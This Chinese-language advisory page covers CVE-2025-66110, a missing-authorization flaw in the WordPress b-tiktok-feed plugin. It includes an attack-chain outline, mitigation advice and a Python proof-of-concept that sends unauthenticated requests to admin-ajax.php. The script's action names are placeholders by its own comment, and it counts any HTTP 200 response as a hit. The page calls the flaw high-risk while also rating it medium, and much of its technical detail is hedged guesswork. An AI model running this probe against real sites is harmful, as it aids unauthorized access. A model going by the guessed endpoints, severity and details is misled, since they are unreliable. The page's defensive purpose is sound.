CVE-2025-66110 WordPress b-tiktok-feed插件缺失授权漏洞

漏洞信息

漏洞编号

CVE-2025-66110

漏洞类型

缺失授权（Missing Authorization）

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress b-tiktok-feed插件（bPlugins Tiktok Feed）

漏洞概述

CVE-2025-66110是WordPress平台b-tiktok-feed插件中的一个高危安全漏洞，属于访问控制缺陷类型。该漏洞存在于插件的授权验证机制中，由于错误配置了访问控制安全级别，导致未经身份验证的远程攻击者可以访问本应需要授权才能使用的敏感功能。b-tiktok-feed是WordPress平台上广受欢迎的TikTok内容嵌入插件，被众多网站用于在页面中展示TikTok视频动态。此漏洞的CVSS评分为5.3（中等严重程度），攻击向量为网络层面，攻击者无需认证或用户交互即可发起攻击。漏洞影响版本从n/a版本一直延续到1.0.23及以下所有版本，攻击者可利用此漏洞获取未授权访问权限，可能导致敏感数据泄露或执行未经授权的操作。

技术细节

该漏洞属于OWASP Top 10中的A01:2021 - Broken Access Control（访问控制失效）类别。在b-tiktok-feed插件的多个API端点中，缺少适当的权限检查和授权验证机制。攻击者可以通过构造特定的HTTP请求，绕过正常的身份验证流程，直接访问受保护的插件功能。具体来说，插件在处理AJAX请求或前端API调用时，未正确验证用户权限，允许任何匿名用户执行本应需要管理员权限的操作。攻击者可能利用此漏洞访问或修改TikTok相关的配置信息，获取API密钥或其他敏感凭证，甚至可能在特定条件下执行管理员操作。此类访问控制缺陷通常源于开发过程中对权限验证的疏忽，或在代码重构时错误地移除了必要的安全检查。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描使用b-tiktok-feed插件（<=1.0.23）的WordPress网站，通过版本检测确认目标存在漏洞插件

STEP 2

步骤2

识别端点：分析插件代码结构，识别缺少授权验证的AJAX端点或API接口，常见端点如admin-ajax.php

STEP 3

步骤3

构造请求：攻击者构造恶意HTTP请求，直接访问受保护的插件功能，无需提供有效的认证凭证

STEP 4

步骤4

权限绕过：利用插件的错误配置访问控制机制，成功绕过身份验证和授权检查

STEP 5

步骤5

执行攻击：根据漏洞利用目标，执行敏感数据读取、配置修改或凭证窃取等未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-66110 PoC - Missing Authorization in b-tiktok-feed
# Target: WordPress site with vulnerable b-tiktok-feed plugin (<=1.0.23)

def check_vulnerability(target_url):
    """
    Check if the target is vulnerable to CVE-2025-66110
    This PoC attempts to access a protected endpoint without authentication
    """
    
    # Common WordPress AJAX endpoint
    ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Try to access plugin's protected functionality
    # Replace 'action_name' with actual vulnerable action
    vulnerable_actions = [
        'b_tiktok_feed_get_config',
        'b_tiktok_feed_save_settings',
        'b_tiktok_feed_fetch_data',
        'b_tiktok_feed_get_credentials'
    ]
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    print(f"[*] Testing target: {target_url}")
    print(f"[*] CVE-2025-66110 - Missing Authorization in b-tiktok-feed")
    
    for action in vulnerable_actions:
        data = {'action': action}
        try:
            response = requests.post(ajax_endpoint, data=data, headers=headers, timeout=10)
            
            # Check if response indicates successful unauthorized access
            if response.status_code == 200:
                print(f"[!] Potential vulnerability found with action: {action}")
                print(f"[*] Response preview: {response.text[:200]}")
                return True
        except requests.RequestException as e:
            print(f"[-] Error testing {action}: {str(e)}")
    
    print("[*] No obvious vulnerability detected (manual verification recommended)")
    return False

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
        check_vulnerability(target)
    else:
        print("Usage: python poc.py http://target.com")

影响范围

b-tiktok-feed插件 <= 1.0.23（所有版本）

防御指南

临时缓解措施

在等待官方安全更新期间，建议管理员立即采取以下临时缓解措施：1）如果暂不需要使用TikTok Feed功能，建议暂时禁用b-tiktok-feed插件；2）使用Web应用防火墙（WAF）规则阻止对/wp-admin/admin-ajax.php的异常请求；3）限制非管理员用户对WordPress后台的访问权限；4）监控服务器日志，警惕异常的AJAX请求模式；5）考虑暂时使用其他经过安全审计的替代插件来满足TikTok内容展示需求。